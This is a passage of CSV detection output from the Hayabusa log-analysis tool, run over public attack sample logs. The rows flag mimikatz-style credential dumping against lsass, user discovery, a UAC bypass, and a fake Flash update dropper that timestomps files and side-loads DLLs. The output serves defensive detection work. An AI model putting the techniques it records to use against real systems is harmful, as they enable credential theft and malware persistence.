pushd ""C:\Users\IEUser\Desktop"" | LID: 0xca21 | PID: 3252 | PGUID: 365ABB72-AC10-5CB8-0000-001047A40700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx +2019-04-18 16:55:44.045 +00:00,IEWIN7,1,low,Exec,Process Start From Suspicious Folder,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx +2019-04-18 16:55:44.135 +00:00,IEWIN7,16,info,,Sysmon Config Change,C:\Users\IEUser\Desktop\sysmonconfig-18-apr-2019.xml,rules/hayabusa/sysmon/events/16_SysmonConfigChange.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx +2019-04-18 16:55:44.135 +00:00,IEWIN7,16,medium,Evas,Sysmon Configuration Change,,rules/sigma/sysmon/sysmon_config_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx +2019-04-18 16:55:44.145 +00:00,IEWIN7,5,info,,Process Terminated,Process: C:\Users\IEUser\Desktop\Sysmon.exe | PID: 3252 | PGUID: 365ABB72-AC10-5CB8-0000-001047A40700,rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx +2019-04-18 16:55:51.275 +00:00,IEWIN7,12,medium,,Registry Key Create/Delete_Sysmon Alert,"technique_id=T1130,technique_name=Install Root Certificate | CreateKey: HKU\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates | Process: C:\Windows\Sysmon.exe | PID: 3192 | PGUID: 365ABB72-AC09-5CB8-0000-0010939A0700",rules/hayabusa/sysmon/alerts/12_RegistryKeyCreateDelete_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx +2019-04-18 16:55:51.275 +00:00,IEWIN7,12,medium,,Registry Key Create/Delete_Sysmon Alert,"technique_id=T1130,technique_name=Install Root Certificate | CreateKey: HKLM\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates | Process: C:\Windows\Sysmon.exe | PID: 3192 | PGUID: 365ABB72-AC09-5CB8-0000-0010939A0700",rules/hayabusa/sysmon/alerts/12_RegistryKeyCreateDelete_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx +2019-04-18 16:55:51.275 +00:00,IEWIN7,12,medium,,Registry Key Create/Delete_Sysmon Alert,"technique_id=T1130,technique_name=Install Root Certificate | CreateKey: HKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Root\Certificates | Process: C:\Windows\Sysmon.exe | PID: 3192 | PGUID: 365ABB72-AC09-5CB8-0000-0010939A0700",rules/hayabusa/sysmon/alerts/12_RegistryKeyCreateDelete_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx +2019-04-18 16:55:51.285 +00:00,IEWIN7,12,medium,,Registry Key Create/Delete_Sysmon Alert,"technique_id=T1130,technique_name=Install Root Certificate | CreateKey: HKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Root\Certificates | Process: C:\Windows\Sysmon.exe | PID: 3192 | PGUID: 365ABB72-AC09-5CB8-0000-0010939A0700",rules/hayabusa/sysmon/alerts/12_RegistryKeyCreateDelete_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx +2019-04-18 16:56:08.370 +00:00,IEWIN7,1,high,,Process Created_Sysmon Alert,"technique_id=T1086,technique_name=PowerShell | Cmd: Powershell | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | User: IEWIN7\IEUser | Parent Cmd: ""cmd.exe"" /s /k pushd ""C:\Users\IEUser\Desktop"" | LID: 0xca21 | PID: 1200 | PGUID: 365ABB72-AC28-5CB8-0000-0010F3F70700 | Hash: SHA1=04C5D2B4DA9A0F3FA8A45702D4256CEE42D8C48D,MD5=92F44E405DB16AC55D97E3BFE3B132FA,SHA256=6C05E11399B7E3C8ED31BAE72014CF249C144A8F4A2C54A758EB2E6FAD47AEC7,IMPHASH=96BA691B035D05F44E35AB23F6BA946C",rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx +2019-04-18 16:56:08.370 +00:00,IEWIN7,1,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_sysmon/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx +2019-04-18 16:56:24.893 +00:00,IEWIN7,1,high,,Process Created_Sysmon Alert,"technique_id=T1033,technique_name=System Owner/User Discovery | Cmd: ""C:\Windows\system32\whoami.exe"" /user | Process: C:\Windows\System32\whoami.exe | User: IEWIN7\IEUser | Parent Cmd: Powershell | LID: 0xca21 | PID: 3576 | PGUID: 365ABB72-AC38-5CB8-0000-0010365E0800 | Hash: SHA1=DC058F52AD8ACBD316827B6DCAC2434AB3CC515C,MD5=0EBF71E33EF09CA65D9683AFA999C473,SHA256=599EFD455AEEEFE2044A9B597061F271595033F5D0DF2C99DFDBCA8394BBCEC3,IMPHASH=C5352B949915AB8CD5E1844790D19274",rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx +2019-04-18 16:56:24.893 +00:00,IEWIN7,1,low,Disc,Local Accounts Discovery,,rules/sigma/process_creation_sysmon/proc_creation_win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx +2019-04-18 16:56:24.893 +00:00,IEWIN7,1,medium,Disc,Whoami Execution,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx +2019-04-18 16:57:04.681 +00:00,IEWIN7,1,high,,Process Created_Sysmon Alert,"technique_id=T1088,technique_name=Bypass User Account Control | Cmd: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc"" | Process: C:\Windows\System32\mmc.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\system32\eventvwr.exe"" | LID: 0xca21 | PID: 3900 | PGUID: 365ABB72-AC60-5CB8-0000-001037BA0800 | Hash: SHA1=98D8C5E38510C6220F42747D15F6FFF75DD59845,MD5=A2A5D487D0C3D55739A0491B6872480D,SHA256=40E2B83F07771D54CE4E45B76A14883D042766FF4E1E7872E482EC91E81E9484,IMPHASH=6D2ED4ADDAC7EBAE62381320D82AC4C1",rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx +2019-04-18 16:57:06.954 +00:00,IEWIN7,11,medium,,File Created_Sysmon Alert,undefined | Path: C:\Windows\System32\Tasks\Microsoft\Windows Defender\MP Scheduled Scan | Process: C:\Windows\system32\svchost.exe | PID: 912 | PGUID: 365ABB72-AB26-5CB8-0000-0010D1AE0000,rules/hayabusa/sysmon/alerts/11_FileCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx +2019-04-18 16:57:52.910 +00:00,IEWIN7,3,medium,,Network Connection_Sysmon Alert,"technique_id=T1031,technique_name=Modify Existing Service | tcp | Src: fe80:0:0:0:80ac:4126:fa58:1b81:49158 (IEWIN7) | Dst: fe80:0:0:0:80ac:4126:fa58:1b81:135 (IEWIN7) | User: IEWIN7\IEUser | Process: C:\Windows\System32\mmc.exe | PID: 3900 | PGUID: 365ABB72-AC60-5CB8-0000-001037BA0800",rules/hayabusa/sysmon/alerts/3_NetworkConnection_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx +2019-04-18 16:58:12.979 +00:00,IEWIN7,7,low,,Image Loaded_Sysmon Alert,"technique_id=T1003,technique_name=Credential Dumping | Image: C:\Windows\System32\cryptdll.dll | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 1200 | PGUID: 365ABB72-AC28-5CB8-0000-0010F3F70700 | Hash: SHA1=C92A5E9D00AAC177C859B40247787E21D2483610,MD5=1128637CAD49A8E3C8B5FA5D0A061525,SHA256=6B80E50D8296F9E2C978CC6BC002B964ACFD8F4BCF623F4770513792845B5278,IMPHASH=CBB91DBEF75B54D8F20A2EC3E1BC8AC2",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx +2019-04-18 16:58:13.389 +00:00,IEWIN7,7,low,,Image Loaded_Sysmon Alert,"technique_id=T1003,technique_name=Credential Dumping | Image: C:\Windows\System32\samlib.dll | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 1200 | PGUID: 365ABB72-AC28-5CB8-0000-0010F3F70700 | Hash: SHA1=922AF00065798A27238A6AE544BE314A3C3C7479,MD5=F3E69E053D4FA762A663ED7B77A5F4DD,SHA256=5D39A09D13D6085EDA7767771268E59888DE7ACE54E6DC9CA1B023E080254BCF,IMPHASH=B9E4EE1E8A5256343DE29E67C1CB41FA",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx +2019-04-18 16:58:13.650 +00:00,IEWIN7,7,low,,Image Loaded_Sysmon Alert,"technique_id=T1003,technique_name=Credential Dumping | Image: C:\Windows\System32\hid.dll | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 1200 | PGUID: 365ABB72-AC28-5CB8-0000-0010F3F70700 | Hash: SHA1=1BC4F63F2111059372F02E0B3893A38589B38688,MD5=63DF770DF74ACB370EF5A16727069AAF,SHA256=B8F96336BF87F1153C245D19606CBD10FBE7CF2795BCC762F2A1B57CB7C39116,IMPHASH=480C71617B8C5E2173781DA9C5B742AE",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx +2019-04-18 16:58:13.740 +00:00,IEWIN7,7,low,,Image Loaded_Sysmon Alert,"technique_id=T1003,technique_name=Credential Dumping | Image: C:\Windows\System32\WinSCard.dll | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 1200 | PGUID: 365ABB72-AC28-5CB8-0000-0010F3F70700 | Hash: SHA1=1C4EA79DABE347BA378654FD2C6EE51B3C7B2868,MD5=9419ABF3163B6F0E3AD3DD2B381C879F,SHA256=75029AFDB5F8A8F74A63B6C8165E77110E2FBAEC0021A9613035BFFEC646A54E,IMPHASH=C9D7A0D2005B11C675EA66DFAC2C77E9",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx +2019-04-18 16:58:14.811 +00:00,IEWIN7,10,high,,Process Access_Sysmon Alert,"technique_id=T1003,technique_name=Credential Dumping | Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\system32\lsass.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1010 | Src PID: 1200 | Src PGUID: 365ABB72-AC28-5CB8-0000-0010F3F70700 | Tgt PID: 472 | Tgt PGUID: 365ABB72-29B3-5CB9-0000-001087490000",rules/hayabusa/sysmon/alerts/10_ProcessAccess_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx +2019-04-18 16:58:14.811 +00:00,IEWIN7,10,high,CredAccess,Accessing WinAPI in PowerShell for Credentials Dumping,,rules/sigma/sysmon/sysmon_accessing_winapi_in_powershell_credentials_dumping.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx +2019-04-18 16:58:14.871 +00:00,IEWIN7,7,low,,Image Loaded_Sysmon Alert,"technique_id=T1003,technique_name=Credential Dumping | Image: C:\Windows\System32\vaultcli.dll | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 1200 | PGUID: 365ABB72-AC28-5CB8-0000-0010F3F70700 | Hash: SHA1=9A398500E906FA979C21CD9F19C929FE798AF9EF,MD5=36B8D5903CEEF0AA42A1EE002BD27FF1,SHA256=CBD5C4D0E05B9A2657D816B655FFFC386807061594DEAABA754658D3152F7403,IMPHASH=55954B415EBB6BF5B592831A5E07DC56",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx +2019-04-18 17:00:09.977 +00:00,IEWIN7,1,high,,Process Created_Sysmon Alert,"technique_id=T1033,technique_name=System Owner/User Discovery | Cmd: ""C:\Windows\system32\whoami.exe"" /user | Process: C:\Windows\System32\whoami.exe | User: IEWIN7\IEUser | Parent Cmd: Powershell | LID: 0xca21 | PID: 3980 | PGUID: 365ABB72-AD19-5CB8-0000-0010F4F40C00 | Hash: SHA1=DC058F52AD8ACBD316827B6DCAC2434AB3CC515C,MD5=0EBF71E33EF09CA65D9683AFA999C473,SHA256=599EFD455AEEEFE2044A9B597061F271595033F5D0DF2C99DFDBCA8394BBCEC3,IMPHASH=C5352B949915AB8CD5E1844790D19274",rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx +2019-04-18 17:00:09.977 +00:00,IEWIN7,1,low,Disc,Local Accounts Discovery,,rules/sigma/process_creation_sysmon/proc_creation_win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx +2019-04-18 17:00:09.977 +00:00,IEWIN7,1,medium,Disc,Whoami Execution,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx +2019-04-18 17:01:34.168 +00:00,IEWIN7,7,low,,Image Loaded_Sysmon Alert,"technique_id=T1003,technique_name=Credential Dumping | Image: C:\Windows\System32\cryptdll.dll | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 1200 | PGUID: 365ABB72-AC28-5CB8-0000-0010F3F70700 | Hash: SHA1=C92A5E9D00AAC177C859B40247787E21D2483610,MD5=1128637CAD49A8E3C8B5FA5D0A061525,SHA256=6B80E50D8296F9E2C978CC6BC002B964ACFD8F4BCF623F4770513792845B5278,IMPHASH=CBB91DBEF75B54D8F20A2EC3E1BC8AC2",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx +2019-04-18 17:01:34.448 +00:00,IEWIN7,7,low,,Image Loaded_Sysmon Alert,"technique_id=T1003,technique_name=Credential Dumping | Image: C:\Windows\System32\samlib.dll | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 1200 | PGUID: 365ABB72-AC28-5CB8-0000-0010F3F70700 | Hash: SHA1=922AF00065798A27238A6AE544BE314A3C3C7479,MD5=F3E69E053D4FA762A663ED7B77A5F4DD,SHA256=5D39A09D13D6085EDA7767771268E59888DE7ACE54E6DC9CA1B023E080254BCF,IMPHASH=B9E4EE1E8A5256343DE29E67C1CB41FA",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx +2019-04-18 17:01:34.659 +00:00,IEWIN7,7,low,,Image Loaded_Sysmon Alert,"technique_id=T1003,technique_name=Credential Dumping | Image: C:\Windows\System32\hid.dll | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 1200 | PGUID: 365ABB72-AC28-5CB8-0000-0010F3F70700 | Hash: SHA1=1BC4F63F2111059372F02E0B3893A38589B38688,MD5=63DF770DF74ACB370EF5A16727069AAF,SHA256=B8F96336BF87F1153C245D19606CBD10FBE7CF2795BCC762F2A1B57CB7C39116,IMPHASH=480C71617B8C5E2173781DA9C5B742AE",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx +2019-04-18 17:01:34.689 +00:00,IEWIN7,7,low,,Image Loaded_Sysmon Alert,"technique_id=T1003,technique_name=Credential Dumping | Image: C:\Windows\System32\WinSCard.dll | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 1200 | PGUID: 365ABB72-AC28-5CB8-0000-0010F3F70700 | Hash: SHA1=1C4EA79DABE347BA378654FD2C6EE51B3C7B2868,MD5=9419ABF3163B6F0E3AD3DD2B381C879F,SHA256=75029AFDB5F8A8F74A63B6C8165E77110E2FBAEC0021A9613035BFFEC646A54E,IMPHASH=C9D7A0D2005B11C675EA66DFAC2C77E9",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx +2019-04-18 17:01:35.680 +00:00,IEWIN7,7,low,,Image Loaded_Sysmon Alert,"technique_id=T1003,technique_name=Credential Dumping | Image: C:\Windows\System32\vaultcli.dll | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 1200 | PGUID: 365ABB72-AC28-5CB8-0000-0010F3F70700 | Hash: SHA1=9A398500E906FA979C21CD9F19C929FE798AF9EF,MD5=36B8D5903CEEF0AA42A1EE002BD27FF1,SHA256=CBD5C4D0E05B9A2657D816B655FFFC386807061594DEAABA754658D3152F7403,IMPHASH=55954B415EBB6BF5B592831A5E07DC56",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx +2019-04-18 17:01:35.720 +00:00,IEWIN7,10,high,,Process Access_Sysmon Alert,"technique_id=T1003,technique_name=Credential Dumping | Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\system32\lsass.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1010 | Src PID: 1200 | Src PGUID: 365ABB72-AC28-5CB8-0000-0010F3F70700 | Tgt PID: 472 | Tgt PGUID: 365ABB72-29B3-5CB9-0000-001087490000",rules/hayabusa/sysmon/alerts/10_ProcessAccess_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx +2019-04-18 17:01:35.720 +00:00,IEWIN7,10,high,CredAccess,Accessing WinAPI in PowerShell for Credentials Dumping,,rules/sigma/sysmon/sysmon_accessing_winapi_in_powershell_credentials_dumping.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx +2019-04-18 17:01:49.961 +00:00,IEWIN7,7,low,,Image Loaded_Sysmon Alert,"technique_id=T1003,technique_name=Credential Dumping | Image: C:\Windows\System32\wlanapi.dll | Process: C:\Windows\System32\svchost.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 1624 | PGUID: 365ABB72-AB28-5CB8-0000-001025060100 | Hash: SHA1=31E713AFCF973171D9A3B0B616F4726CD3CFE621,MD5=837E870DBDEE3D19122C833389D81CC9,SHA256=4C4410B103A80D9502E6842033BBDA2952C219824DCCA75EEB8265C94A53FBC4,IMPHASH=6C6D0BFAB9C996952B5E81BA61DB929E",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx +2019-04-18 17:03:03.321 +00:00,IEWIN7,11,medium,,File Created_Sysmon Alert,"technique_id=T1187,technique_name=Forced Authentication | Path: C:\Users\IEUser\AppData\Roaming\Microsoft\Windows\Recent\sysmon.evtx.lnk | Process: C:\Windows\Explorer.EXE | PID: 1388 | PGUID: 365ABB72-AB28-5CB8-0000-0010F2E20000",rules/hayabusa/sysmon/alerts/11_FileCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx +2019-04-18 17:03:03.441 +00:00,IEWIN7,11,medium,,File Created_Sysmon Alert,"technique_id=T1187,technique_name=Forced Authentication | Path: C:\Users\IEUser\AppData\Roaming\Microsoft\Windows\Recent\HTools (vboxsrv) (D).lnk | Process: C:\Windows\Explorer.EXE | PID: 1388 | PGUID: 365ABB72-AB28-5CB8-0000-0010F2E20000",rules/hayabusa/sysmon/alerts/11_FileCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx +2019-04-27 15:57:25.868 +00:00,IEWIN7,11,info,,File Created,Path: C:\Users\IEUser\Downloads\Flash_update.exe | Process: C:\Windows\Explorer.EXE | PID: 2772 | PGUID: 365ABB72-7ACC-5CC4-0000-0010B2470300,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/DE_timestomp_and_dll_sideloading_and_RunPersist.evtx +2019-04-27 15:57:25.868 +00:00,IEWIN7,11,low,ResDev,Creation of an Executable by an Executable,,rules/sigma/file_event/file_event_win_susp_dropper.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/DE_timestomp_and_dll_sideloading_and_RunPersist.evtx +2019-04-27 15:57:27.087 +00:00,IEWIN7,11,info,,File Created,Path: C:\Windows\System32\Tasks\Microsoft\Windows Defender\MP Scheduled Scan | Process: C:\Windows\system32\svchost.exe | PID: 944 | PGUID: 365ABB72-7AB0-5CC4-0000-0010C5BE0000,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/DE_timestomp_and_dll_sideloading_and_RunPersist.evtx +2019-04-27 15:57:53.368 +00:00,IEWIN7,1,high,,Process Created_Sysmon Alert,"technique_id=T1036,technique_name=Masquerading | Cmd: ""C:\Users\IEUser\Downloads\Flash_update.exe"" | Process: C:\Users\IEUser\Downloads\Flash_update.exe | User: IEWIN7\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0xf4be | PID: 2680 | PGUID: 365ABB72-7C01-5CC4-0000-00102B3E0C00 | Hash: SHA1=B4E581F173F782A2F1DA5D29C95946EE500EB2D0,MD5=42893ADBC36605EC79B5BD610759947E,SHA256=1A061C74619DE6AF8C02CBA0FA00754BDD9E3515C0E08CAD6350C7ADFC8CDD5B,IMPHASH=40BEC1A4A3BCB7D3089B5E1532386613",rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/DE_timestomp_and_dll_sideloading_and_RunPersist.evtx +2019-04-27 15:57:53.368 +00:00,IEWIN7,1,medium,Exec,Suspicious File Characteristics Due to Missing Fields,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_file_characteristics.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/DE_timestomp_and_dll_sideloading_and_RunPersist.evtx +2019-04-27 15:57:53.587 +00:00,IEWIN7,7,low,,Image Loaded_Sysmon Alert,"dll side loading | Image: C:\Windows\System32\winmm.dll | Process: C:\Users\IEUser\Downloads\Flash_update.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 2680 | PGUID: 365ABB72-7C01-5CC4-0000-00102B3E0C00 | Hash: SHA1=41905C387FA657D91DA8A743ABC04B6C11A38B52,MD5=D5AEFAD57C08349A4393D987DF7C715D,SHA256=C36A45BC2448DF30CD17BD2F8A17FC196FAFB685612CACCEB22DC7B58515C201,IMPHASH=1A7210F2C9930AF9B51025300C67DA77",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/DE_timestomp_and_dll_sideloading_and_RunPersist.evtx +2019-04-27 15:57:53.650 +00:00,IEWIN7,2,low,Evas,Possible Timestomping,Path: C:\Users\IEUser\AppData\Roaming\NvSmart.exe | Process: C:\Users\IEUser\Downloads\Flash_update.exe | CreationUtcTime: 2013-09-04 16:29:27.000 | PreviousCreationUtcTime: 2019-04-27 15:57:53.634 | PID: %PID% | PGUID: 365ABB72-7C01-5CC4-0000-00102B3E0C00,rules/hayabusa/sysmon/alerts/2_PossibleTimestomping.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/DE_timestomp_and_dll_sideloading_and_RunPersist.evtx +2019-04-27 15:57:53.650 +00:00,IEWIN7,2,low,Evas,Possible Timestomping,Path: C:\Users\IEUser\AppData\Roaming\NvSmartMax.dll | Process: C:\Users\IEUser\Downloads\Flash_update.exe | CreationUtcTime: 2013-09-04 16:29:27.000 | PreviousCreationUtcTime: 2019-04-27 15:57:53.634 | PID: %PID% | PGUID: 365ABB72-7C01-5CC4-0000-00102B3E0C00,rules/hayabusa/sysmon/alerts/2_PossibleTimestomping.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/DE_timestomp_and_dll_sideloading_and_RunPersist.evtx +2019-04-27 15:57:53.650 +00:00,IEWIN7,2,low,Evas,Possible Timestomping,Path: C:\Users\IEUser\AppData\Roaming\NvSmartMax.dll.url | Process: C:\Users\IEUser\Downloads\Flash_update.exe | CreationUtcTime: 2013-09-05 17:50:28.000 | PreviousCreationUtcTime: 2019-04-27 15:57:53.650 | PID: %PID% | PGUID: 365ABB72-7C01-5CC4-0000-00102B3E0C00,rules/hayabusa/sysmon/alerts/2_PossibleTimestomping.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/DE_timestomp_and_dll_sideloading_and_RunPersist.evtx +2019-04-27 15:57:53.650 +00:00,IEWIN7,11,info,,File Created,Path: C:\Users\IEUser\AppData\Roaming\NvSmart.exe | Process: C:\Users\IEUser\Downloads\Flash_update.exe | PID: 2680 | PGUID: 365ABB72-7C01-5CC4-0000-00102B3E0C00,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/DE_timestomp_and_dll_sideloading_and_RunPersist.evtx +2019-04-27 15:57:53.650 +00:00,IEWIN7,11,info,,File Created,Path: C:\Users\IEUser\AppData\Roaming\NvSmartMax.dll | Process: C:\Users\IEUser\Downloads\Flash_update.exe | PID: 2680 | PGUID: 365ABB72-7C01-5CC4-0000-00102B3E0C00,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/DE_timestomp_and_dll_sideloading_and_RunPersist.evtx +2019-04-27 15:57:53.650 +00:00,IEWIN7,11,low,ResDev,Creation of an Executable by an Executable,,rules/sigma/file_event/file_event_win_susp_dropper.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/DE_timestomp_and_dll_sideloading_and_RunPersist.evtx +2019-04-27 15:57:53.837 +00:00,IEWIN7,7,low,,Image Loaded_Sysmon Alert,"dll side loading | Image: C:\Users\IEUser\AppData\Roaming\NvSmart.exe | Process: C:\Users\IEUser\Downloads\Flash_update.exe | Company: ? | Signed: true | Signature: Valid | PID: 2680 | PGUID: 365ABB72-7C01-5CC4-0000-00102B3E0C00 | Hash: 